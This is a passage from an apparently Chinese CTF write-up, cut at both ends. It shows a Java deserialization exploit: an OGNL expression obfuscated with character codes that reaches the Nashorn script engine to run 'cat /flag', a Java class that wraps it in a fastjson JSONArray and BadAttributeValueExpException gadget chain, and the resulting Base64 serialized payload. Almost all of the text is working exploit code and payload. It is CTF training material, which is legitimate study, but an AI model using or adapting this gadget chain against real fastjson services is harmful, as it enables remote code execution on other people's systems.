[0].toString()).concat(true.toString().charAt(0).toChars(100)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(100)[0].toString()).concat(true.toString().charAt(0).toChars(67)[0].toString()).concat(true.toString().charAt(0).toChars(104)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(115)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(115)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(85)[0].toString()).concat(true.toString().charAt(0).toChars(84)[0].toString()).concat(true.toString().charAt(0).toChars(70)[0].toString()).concat(true.toString().charAt(0).toChars(95)[0].toString()).concat(true.toString().charAt(0).toChars(56)[0].toString()).concat(true.toString().charAt(0).toChars(41)[0].toString()).concat(true.toString().charAt(0).toChars(41)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(100)[0].toString()).concat(true.toString().charAt(0).toChars(76)[0].toString()).concat(true.toString().charAt(0).toChars(105)[0].toString()).concat(true.toString().charAt(0).toChars(110)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(40)[0].toString()).concat(true.toString().charAt(0).toChars(41)[0].toString()))

再利用到原先的fastjson链子生成最终的payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import com.alibaba.fastjson.JSONArray;
import com.ctf.expr.entity.User;
import ognl.Ognl;
import ognl.OgnlContext;

import javax.management.BadAttributeValueExpException;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;

public class Exp {
    public static void main(String[] args) throws Exception {
        String exp = "true.class.forName(true.toString().charAt(0).toChars(106)[0].toString().concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(118)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(120)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(115)[0].toString()).concat(true.toString().charAt(0).toChars(99)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(105)[0].toString()).concat(true.toString().charAt(0).toChars(112)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(83)[0].toString()).concat(true.toString().charAt(0).toChars(99)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(105)[0].toString()).concat(true.toString().charAt(0).toChars(112)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(69)[0].toString()).concat(true.toString().charAt(0).toChars(110)[0].toString()).concat(true.toString().charAt(0).toChars(103)[0].toString()).concat(true.toString().charAt(0).toChars(105)[0].toString()).concat(true.toString().charAt(0).toChars(110)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(77)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(110)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(103)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString())).newInstance().getEngineByName(true.toString().charAt(0).toChars(110)[0].toString().concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(115)[0].toString()).concat(true.toString().charAt(0).toChars(104)[0].toString()).concat(true.toString().charAt(0).toChars(111)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(110)[0].toString())).eval(true.toString().charAt(0).toChars(34)[0].toString().concat(true.toString().charAt(0).toChars(39)[0].toString()).concat(true.toString().charAt(0).toChars(34)[0].toString()).concat(true.toString().charAt(0).toChars(43)[0].toString()).concat(true.toString().charAt(0).toChars(40)[0].toString()).concat(true.toString().charAt(0).toChars(110)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(119)[0].toString()).concat(true.toString().charAt(0).toChars(32)[0].toString()).concat(true.toString().charAt(0).toChars(106)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(118)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(105)[0].toString()).concat(true.toString().charAt(0).toChars(111)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(66)[0].toString()).concat(true.toString().charAt(0).toChars(117)[0].toString()).concat(true.toString().charAt(0).toChars(102)[0].toString()).concat(true.toString().charAt(0).toChars(102)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(100)[0].toString()).concat(true.toString().charAt(0).toChars(82)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(100)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(40)[0].toString()).concat(true.toString().charAt(0).toChars(110)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(119)[0].toString()).concat(true.toString().charAt(0).toChars(32)[0].toString()).concat(true.toString().charAt(0).toChars(106)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(118)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(105)[0].toString()).concat(true.toString().charAt(0).toChars(111)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(73)[0].toString()).concat(true.toString().charAt(0).toChars(110)[0].toString()).concat(true.toString().charAt(0).toChars(112)[0].toString()).concat(true.toString().charAt(0).toChars(117)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(83)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(109)[0].toString()).concat(true.toString().charAt(0).toChars(82)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(100)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(40)[0].toString()).concat(true.toString().charAt(0).toChars(110)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(119)[0].toString()).concat(true.toString().charAt(0).toChars(32)[0].toString()).concat(true.toString().charAt(0).toChars(106)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(118)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(108)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(110)[0].toString()).concat(true.toString().charAt(0).toChars(103)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(80)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(111)[0].toString()).concat(true.toString().charAt(0).toChars(99)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(115)[0].toString()).concat(true.toString().charAt(0).toChars(115)[0].toString()).concat(true.toString().charAt(0).toChars(66)[0].toString()).concat(true.toString().charAt(0).toChars(117)[0].toString()).concat(true.toString().charAt(0).toChars(105)[0].toString()).concat(true.toString().charAt(0).toChars(108)[0].toString()).concat(true.toString().charAt(0).toChars(100)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(40)[0].toString()).concat(true.toString().charAt(0).toChars(34)[0].toString()).concat(true.toString().charAt(0).toChars(99)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(34)[0].toString()).concat(true.toString().charAt(0).toChars(44)[0].toString()).concat(true.toString().charAt(0).toChars(34)[0].toString()).concat(true.toString().charAt(0).toChars(47)[0].toString()).concat(true.toString().charAt(0).toChars(102)[0].toString()).concat(true.toString().charAt(0).toChars(108)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(103)[0].toString()).concat(true.toString().charAt(0).toChars(34)[0].toString()).concat(true.toString().charAt(0).toChars(41)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(115)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(40)[0].toString()).concat(true.toString().charAt(0).toChars(41)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(103)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(73)[0].toString()).concat(true.toString().charAt(0).toChars(110)[0].toString()).concat(true.toString().charAt(0).toChars(112)[0].toString()).concat(true.toString().charAt(0).toChars(117)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(83)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(109)[0].toString()).concat(true.toString().charAt(0).toChars(40)[0].toString()).concat(true.toString().charAt(0).toChars(41)[0].toString()).concat(true.toString().charAt(0).toChars(44)[0].toString()).concat(true.toString().charAt(0).toChars(32)[0].toString()).concat(true.toString().charAt(0).toChars(34)[0].toString()).concat(true.toString().charAt(0).toChars(71)[0].toString()).concat(true.toString().charAt(0).toChars(66)[0].toString()).concat(true.toString().charAt(0).toChars(75)[0].toString()).concat(true.toString().charAt(0).toChars(34)[0].toString()).concat(true.toString().charAt(0).toChars(41)[0].toString()).concat(true.toString().charAt(0).toChars(41)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(114)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(100)[0].toString()).concat(true.toString().charAt(0).toChars(76)[0].toString()).concat(true.toString().charAt(0).toChars(105)[0].toString()).concat(true.toString().charAt(0).toChars(110)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(40)[0].toString()).concat(true.toString().charAt(0).toChars(41)[0].toString()).concat(true.toString().charAt(0).toChars(41)[0].toString()).concat(true.toString().charAt(0).toChars(43)[0].toString()).concat(true.toString().charAt(0).toChars(34)[0].toString()).concat(true.toString().charAt(0).toChars(39)[0].toString()).concat(true.toString().charAt(0).toChars(34)[0].toString()))";
        User u = new User("aaaaaa","aaaaaaa",exp);
        JSONArray jsonArray= new JSONArray();
        jsonArray.add(u);
        BadAttributeValueExpException attributeValueExpException = new BadAttributeValueExpException(null);
        Class<?> badAttributeValueExpException = Class.forName("javax.management.BadAttributeValueExpException");
        Field val = badAttributeValueExpException.getDeclaredField("val");
        val.setAccessible(true);
        val.set(attributeValueExpException,jsonArray);
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(attributeValueExpException);
        objectOutputStream.close();
        System.out.println(Base64.getEncoder().encodeToString(byteArrayOutputStream.toByteArray()));
    }
}

所以最终的exp为:

1
rO0ABXNyAC5qYXZheC5tYW5hZ2VtZW50LkJhZEF0dHJpYnV0ZVZhbHVlRXhwRXhjZXB0aW9u1Ofaq2MtRkACAAFMAAN2YWx0ABJMamF2YS9sYW5nL09iamVjdDt4cgATamF2YS5sYW5nLkV4Y2VwdGlvbtD9Hz4aOxzEAgAAeHIAE2phdmEubGFuZy5UaHJvd2FibGXVxjUnOXe4ywMABEwABWNhdXNldAAVTGphdmEvbGFuZy9UaHJvd2FibGU7TAANZGV0YWlsTWVzc2FnZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sACnN0YWNrVHJhY2V0AB5bTGphdmEvbGFuZy9TdGFja1RyYWNlRWxlbWVudDtMABRzdXBwcmVzc2VkRXhjZXB0aW9uc3QAEExqYXZhL3V0aWwvTGlzdDt4cHEAfgAIcHVyAB5bTGphdmEubGFuZy5TdGFja1RyYWNlRWxlbWVudDsCRio8PP0iOQIAAHhwAAAAAXNyABtqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnRhCcWaJjbdhQIABEkACmxpbmVOdW1iZXJMAA5kZWNsYXJpbmdDbGFzc3EAfgAFTAAIZmlsZU5hbWVxAH4ABUwACm1ldGhvZE5hbWVxAH4ABXhwAAAAFHQAEGNvbS5jdGYuZXhwci5FeHB0AAhFeHAuamF2YXQABG1haW5zcgAmamF2YS51dGlsLkNvbGxlY3Rpb25zJFVubW9kaWZpYWJsZUxpc3T8DyUxteyOEAIAAUwABGxpc3RxAH4AB3hyACxqYXZhLnV0aWwuQ29sbGVjdGlvbnMkVW5tb2RpZmlhYmxlQ29sbGVjdGlvbhlCAIDLXvceAgABTAABY3QAFkxqYXZhL3V0aWwvQ29sbGVjdGlvbjt4cHNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAAAdwQAAAAAeHEAfgAVeHNyAB5jb20uYWxpYmFiYS5mYXN0anNvbi5KU09OQXJyYXkAAAAAAAAAAQIAAUwABGxpc3RxAH4AB3hwc3EAfgAUAAAAAXcEAAAAAXNyABhjb20uY3RmLmV4cHIuZW50aXR5LlVzZXLjOKCJGj+VGgIAA0wABGV4cHJxAH4ABUwACHBhc3N3b3JkcQB+AAVMAAh1c2VybmFtZXEAfgAFeHB0LgR0cnVlLmNsYXNzLmZvck5hbWUodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDEwNilbMF0udG9TdHJpbmcoKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDk3KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDExOClbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycyg5NylbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMjApWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoNDYpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTE1KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDk5KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDExNClbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMDUpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTEyKVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDExNilbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycyg0NilbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycyg4MylbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycyg5OSlbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMTQpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTA1KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDExMilbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMTYpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoNjkpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTEwKVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDEwMylbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMDUpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTEwKVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDEwMSlbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycyg3NylbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycyg5NylbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMTApWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoOTcpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTAzKVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDEwMSlbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMTQpWzBdLnRvU3RyaW5nKCkpKS5uZXdJbnN0YW5jZSgpLmdldEVuZ2luZUJ5TmFtZSh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTEwKVswXS50b1N0cmluZygpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoOTcpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTE1KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDEwNClbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMTEpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTE0KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDExMClbMF0udG9TdHJpbmcoKSkpLmV2YWwodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDM0KVswXS50b1N0cmluZygpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMzkpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMzQpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoNDMpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoNDApWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTEwKVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDEwMSlbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMTkpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMzIpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTA2KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDk3KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDExOClbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycyg5NylbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycyg0NilbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMDUpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTExKVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDQ2KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDY2KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDExNylbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMDIpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTAyKVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDEwMSlbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMTQpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTAxKVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDEwMClbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycyg4MilbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMDEpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoOTcpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTAwKVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDEwMSlbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMTQpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoNDApWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTEwKVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDEwMSlbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMTkpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMzIpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTA2KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDk3KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDExOClbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycyg5NylbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycyg0NilbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMDUpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTExKVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDQ2KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDczKVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDExMClbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMTIpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTE3KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDExNilbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycyg4MylbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMTYpWzBdLnRvU3RyaW5nKCkpLmNvbmNhdCh0cnVlLnRvU3RyaW5nKCkuY2hhckF0KDApLnRvQ2hhcnMoMTE0KVswXS50b1N0cmluZygpKS5jb25jYXQodHJ1ZS50b1N0cmluZygpLmNoYXJBdCgwKS50b0NoYXJzKDEwMSlbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycyg5NylbMF0udG9TdHJpbmcoKSkuY29uY2F0KHRydWUudG9TdHJpbmcoKS5jaGFyQXQoMCkudG9DaGFycygxMDkpWzBdLnRvU3RyaW5nKCkpLmNvbmNhd